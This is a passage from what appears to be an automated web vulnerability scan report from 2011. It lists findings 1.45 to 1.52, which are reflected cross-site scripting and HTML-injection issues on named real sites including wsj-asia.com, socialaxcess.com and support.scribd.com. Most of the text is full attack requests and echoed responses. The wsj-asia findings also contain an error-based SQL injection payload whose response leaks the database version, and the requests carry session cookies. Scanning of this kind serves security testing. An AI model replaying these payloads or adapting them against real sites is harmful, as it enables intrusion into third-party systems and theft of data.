Referer: http://www.scribd.com/doc/37405970/360i-s-Mobile-Marketing-Playbook
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030; __qca=P0-1314780605-1317923807712; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.3.9.1317923808; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 17:57:36 GMT
Content-Type: text/javascript; charset=UTF-8"
Connection: keep-alive
Content-Length: 121
Etag: "2e47eaa1b09096c5b60a9397ab30fffb97a395fe"
Server: TornadoServer/1.2.1

jsonp566718f37cd<script>alert(1)</script>a929a3a3307([{"status": "success", "logTimeoutLen": 30000.0, "vid": 558946891}])

1.45. https://secure.wsj-asia.com/subscription/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6e9e<script>alert(1)</script>3a010eeafdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))/f6e9e<script>alert(1)</script>3a010eeafdd%2B' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 538
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>3a010eeafdd+''
           GROUP BY source' at line 3<
...[SNIP]...
lect 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))/f6e9e<script>alert(1)</script>3a010eeafdd+''
           GROUP BY source</b>

1.46. https://secure.wsj-asia.com/subscription/index.php [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The value of the source request parameter is copied into the HTML document as plain text between tags. The payload 24c14<script>alert(1)</script>99041cd2efb was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'24c14<script>alert(1)</script>99041cd2efb HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 391
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'24c14<script>alert(1)</script>99041cd2efb'
           GROUP BY source</b>

1.47. http://socialaxcess.com/wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://socialaxcess.com
Path:   /wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 1b75f<script>alert(1)</script>69889d2229c was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://socialaxcess.com/wp-content/uploads/LikeButton-e1314790707810-290x244.gif1b75f<script>alert(1)</script>69889d2229c&h=45&w=45&zc=1 HTTP/1.1
Host: socialaxcess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://socialaxcess.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e2lssq2dt92rujejqe914hb4j1

Response

HTTP/1.1 400 Bad Request
Date: Thu, 06 Oct 2011 20:53:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Length: 113
Connection: close
Content-Type: text/html

file not found /wp-content/uploads/LikeButton-e1314790707810-290x244.gif1b75f<script>alert(1)</script>69889d2229c

1.48. http://support.scribd.com/attachments/token/0r1qoxsjyogmbvn/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/0r1qoxsjyogmbvn/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8657"><a>f0f1e94f95c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/0r1qoxsjyogmbvnf8657"><a>f0f1e94f95c/?name=support-req.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIjaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9ob21lOg9zZXNzaW9uX2lkIiU1NDI1YTc2NTgwODdiMmFmOWFiZDdmYjlkZjU0YmQ2MDoPdXBkYXRlZF9hdGwrB1%2FsjU4iE3dhcmRlbi5tZXNzYWdlewA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPToHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--bdc4a3dabdb12e31cce91c198f04e3331e99c805

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 17:59:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 65
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJraHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi8wcjFxb3hzanlvZ21idm5mODY1NyI%2BPGE%2BZjBmMWU5NGY5NWMvP25hbWU9c3VwcG9ydC1yZXEucG5nOg9zZXNzaW9uX2lkIiU2YTg4MjA2Y2EwOGMxY2MwMjRlZWNiZWE2NjZmNGExYToPdXBkYXRlZF9hdGwrB5vsjU46EF9jc3JmX3Rva2VuIjEydVhjSWZtRDREaEZOeTBtVjdINmdXRVlFRHBhMzc5M3RwOGhraVlOaXFFPToHaWQiFG0xM2xzcGF0aDVjZ3Mwag%3D%3D--3d05875a41524175bae111685c750a60853e4a75; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/0r1qoxsjyogmbvnf8657"><a>f0f1e94f95c/?name=support-req.png" />
...[SNIP]...

1.49. http://support.scribd.com/attachments/token/1d05v67jplm55tp/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/1d05v67jplm55tp/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f08"><a>18ed53035cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/1d05v67jplm55tp33f08"><a>18ed53035cb/?name=profile-annotated.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 77
Set-Cookie: _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJxaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi8xZDA1djY3anBsbTU1dHAzM2YwOCI%2BPGE%2BMThlZDUzMDM1Y2IvP25hbWU9cHJvZmlsZS1hbm5vdGF0ZWQucG5nOg9zZXNzaW9uX2lkIiU1NDI1YTc2NTgwODdiMmFmOWFiZDdmYjlkZjU0YmQ2MDoPdXBkYXRlZF9hdGwrB8fsjU4iE3dhcmRlbi5tZXNzYWdlewA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPToHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--5caec39a5d6b6b7c719a8c9be6e16abda9973b74; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/1d05v67jplm55tp33f08"><a>18ed53035cb/?name=profile-annotated.png" />
...[SNIP]...

1.50. http://support.scribd.com/attachments/token/599fllhdxalyimd/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/599fllhdxalyimd/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24476"><a>c2f856cf4ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/599fllhdxalyimd24476"><a>c2f856cf4ed/?name=Scribd_Homepage.jpg HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 74
Set-Cookie: _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJvaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi81OTlmbGxoZHhhbHlpbWQyNDQ3NiI%2BPGE%2BYzJmODU2Y2Y0ZWQvP25hbWU9U2NyaWJkX0hvbWVwYWdlLmpwZzoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB8DsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--0de82a6ae090b45958c479e11683a9be503adb56; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/599fllhdxalyimd24476"><a>c2f856cf4ed/?name=Scribd_Homepage.jpg" />
...[SNIP]...

1.51. http://support.scribd.com/attachments/token/8hhgf6ydvilzyqs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/8hhgf6ydvilzyqs/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9e83"><a>70ef6bfcd76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/8hhgf6ydvilzyqsa9e83"><a>70ef6bfcd76/?name=menubar.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 61
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJnaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi84aGhnZjZ5ZHZpbHp5cXNhOWU4MyI%2BPGE%2BNzBlZjZiZmNkNzYvP25hbWU9bWVudWJhci5wbmc6D3Nlc3Npb25faWQiJTZjOWEzMWNkNjQ4ZTkwM2YwZjRmMmEyZDY4NWZjM2FlOg91cGRhdGVkX2F0bCsHs%2ByNTjoQX2NzcmZfdG9rZW4iMUJ3R3dvY3hvN3J5RjFQb25UNUFRQ2xOSzVNVGVoTGtrK045NEE5QjhLTHc9OgdpZCIVazZibHNueDR6LWEzcGRnMQ%3D%3D--b3a8c509d14c9f93ae1bac5121af0b5a51014d21; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/8hhgf6ydvilzyqsa9e83"><a>70ef6bfcd76/?name=menubar.png" />
...[SNIP]...

1.52. http://support.scribd.com/attachments/token/azo6pbskoyom0rk/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/azo6pbskoyom0rk/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf3d2"><a>3db8303db4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

